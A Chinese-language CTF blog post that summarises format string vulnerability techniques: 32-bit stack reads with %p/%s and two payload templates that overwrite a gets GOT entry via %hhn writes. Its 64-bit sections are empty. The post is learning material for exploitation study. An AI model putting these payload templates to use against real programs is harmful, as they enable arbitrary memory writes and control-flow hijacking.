

pollux's Dairy

格式化字符串漏洞总结

pollux's Dairy

格式化字符串漏洞总结

fsb

字数统计: 219阅读时长: 1 min

 2018/09/16   Share

• 
• 
• 
• 
• 

0x00 32位下读

• ‘%num$08x’
• ‘%num$p’
• ‘%num$s’

  %x 整数的参数会被转成无符号的十六进制数字
  %p 如果是参数是”void *”型指针则使用十六进制格式显示
  %s 指向字符串的参数会被逐字输出，直到出现NULL 字符为止

0x01 32位下写

• 修改get@got表中的内容(利用python的格式化特性)
  p32(gets@got) + ‘%%%dc’ %(data-4) + ‘%num$hhn’

• 修改get@got表中的内容
  payload = ‘%’ + str(data) +’c%16$hhn’ if data != 0 else ‘%16$hhn’
  payload += ‘A’*(48-len(payload)) + p32(get@got)

0x02 64位下读

0x03 64位下写

0x04 Conclusion

1. 可以泄露栈地址
2. 可以任意地址写，比如通过泄露的栈地址，计算出保存返回地址的栈地址，然后修改返回地址
   3.

原文作者：Po1lux

原文链接：http://yoursite.com/2018/09/16/格式化字符串漏洞总结/

发表日期：September 16th 2018, 12:00:00 am

更新日期：March 2nd 2020, 8:02:20 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  X-CTF Quals 2016 - b0verfl0w
• Previous Post
  FengyunCup-2016-safedoor

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 0x00 32位下读
2. 2. 0x01 32位下写
3. 3. 0x02 64位下读
4. 4. 0x03 64位下写
5. 5. 0x04 Conclusion



• Archive
• Tag
• Cate

Total : 56

2020

• 04/11de5811cdab48a0f5e656384bd3feff88
• 03/30C++虚表杂记
• 03/2651ff4f42e4a8218a6d27ec8cd9874f37
• 03/25android-6.0.0源码分析-zygote启动过程
• 02/23mineucore-内核线程管理学习笔记
• 02/21mineucore-x86-32下的中断处理
• 02/20mineucore-x86-32系统启动流程
• 02/19inlineHookS安卓内联hook框架
• 01/31内存壳学习
• 01/04汇编分析一个so文件中的变形RC4和变形base64算法

2019

• 12/17ubuntu-16.04 源码编译 Android-6.0.0_r1 与调试
• 12/17ubuntu16.04 处理wifi问题小记
• 12/15FUPK源码阅读
• 12/14Android-6.0.0_r1源码分析-Java层加载Dex和类的过程
• 12/09NDK开发学习记录
• 12/02初试反调试
• 12/01手机和AS中debug环境配置问题小记
• 11/27nexus5环境配置
• 11/23通过在native层动态修改内存中的Dalvik指令来学习Dex文件格式
• 11/20IDA notebook
• 11/08使用frida Hook动态加载Dex
• 11/06frida-notebook
• 11/04Linux Kernel ROP
• 10/06mineucore-虚拟内存管理学习笔记
• 10/03mineucore-物理内存管理学习笔记
• 09/22seccomp沙箱机制 & 2019ByteCTF VIP
• 06/252019-SCTF-easy_heap[fastbin attack]
• 06/252019-SCTF-one_heap[tcache的counts中存在的数据类型判断漏洞]
• 06/102019-TCTF(final)-babyheap2.29
• 05/272018-0CTF-heapstorm2
• 05/052019-sixstarsCTF-babyshell[shellcode]
• 05/042019-sixstarsCTF-heap_master
• 05/032018-hitcon-baby_tcache
• 05/032018-Hitcon-children_tcache
• 05/022019-sixstarsCTF-girlfriend[libc2.29,tcache]
• 05/012019-sixstarsCTF-quicksort
• 04/172018-网顶杯CTF-blind
• 04/132019-西湖论剑CTF-Strom_note-[off by one, largebin attack]
• 04/102019-西湖论剑CTF-noinfoleak
• 04/092019-西湖论剑CTF-story
• 04/042018-SUCTF-lock2-[fmt,栈溢出,Canary]
• 04/012018-SUCTF-note
• 03/29House_of_Orange在2.24glibc下的利用
• 03/272016-Hitcon-House_of_Orange
• 03/242018-SUCTF-Heap-[off by one,unlink]
• 03/202016-BCTF-bcloud-[Heap of Force]
• 03/10libc源码分析-chunk的释放
• 03/082014-hack.lu CTF-OREO-[House of spirit]
• 03/022016-HCTF-fheap-[fastbin UAF,PIE,DynELF use fmt]

2018

• 10/202016 ZCTF note2
• 10/172014 HITCON stkof
• 10/11QiangwangCup-2015-shellman
• 09/30X-CTF Quals 2016 - b0verfl0w
• 09/16格式化字符串漏洞总结
• 09/15FengyunCup-2016-safedoor
• 09/13pwnable.kr-brain fuck

unlink fastbin attack House of spirit House of Force UAF DynELF PIE format string off by one x64 64bit 格式化字符串漏洞 栈溢出 Canary tcache libc-2.29 chunk overlapping chunk extend shellcode，系统调用 libc2.29 stack overflow fmt rop 2016，CTFs，fsb CTF stack pivoting OS pwnable fsb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

heap stack android-reverse learning-note android-system Operating-System pwnable conclusion

